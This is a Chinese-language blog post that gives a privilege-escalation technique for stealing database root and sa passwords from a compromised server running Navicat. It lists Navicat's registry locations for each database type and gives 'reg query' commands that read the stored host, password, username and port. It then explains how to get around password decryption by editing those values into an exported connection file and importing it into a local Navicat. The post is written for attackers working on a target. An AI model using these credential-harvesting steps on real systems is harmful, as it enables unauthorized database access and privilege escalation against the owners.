提权奇技淫巧之Navicat获取ROOT、SA密码

Mr.Wu 3,287 0

在提权的过程中,如果能得到MYSQL的ROOT账号,又或者MSSQL的SA账号等等数据裤信息,会给我们的提权大大的增加成功的可能和提权效率。

而本文记录的是如果找不到ROOT或者SA,目标服务器中又恰巧安装有Navicat的话,可以通过Navicat尝试获取ROOT、SA密码,国外大牛文章地址[ GO ]

注册表对应位置

Database Type Path
MySQL HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\<your connection name>
MariaDB HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\<your connection name>
Microsoft SQL HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\<your connection name>
Oracle HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\<your connection name>
PostgreSQL HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\<your connection name>
SQLite HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\<your connection name>

CMD命令下查询

reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v host
reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v pwd
reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v UserName
reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v port

密码是加密的,需要解密

国外大佬详细的分析了一波Navicat的加密解密,其实我想说,哪有那么麻烦,Navicat自带导出导入功能。

比如我已经通过以上的命令,获取到了目标的MYSQL的链接信息,那么我只需要打开本地电脑中的Navicat,创建一个MYSQL链接信息,随便填即可。

创建好了过后我们在将这个链接信息导出

然后在用记事本打开导出的这个文件

如上图,这样一对比,是不是一目了然?我们只需要将查询注册表时得到的 host pwd username port 信息改进这个ncx文件里,然后在Navicat导入这个文件即可。

需要注意的是Navicat 11和Navicat 12使用不同的算法来加密密码,所以本地的Navicat得和目标上的Navicat版本一致。

广告

打赏
发表评论 取消回复
表情 图片 链接 代码

分享
微信
微博
QQ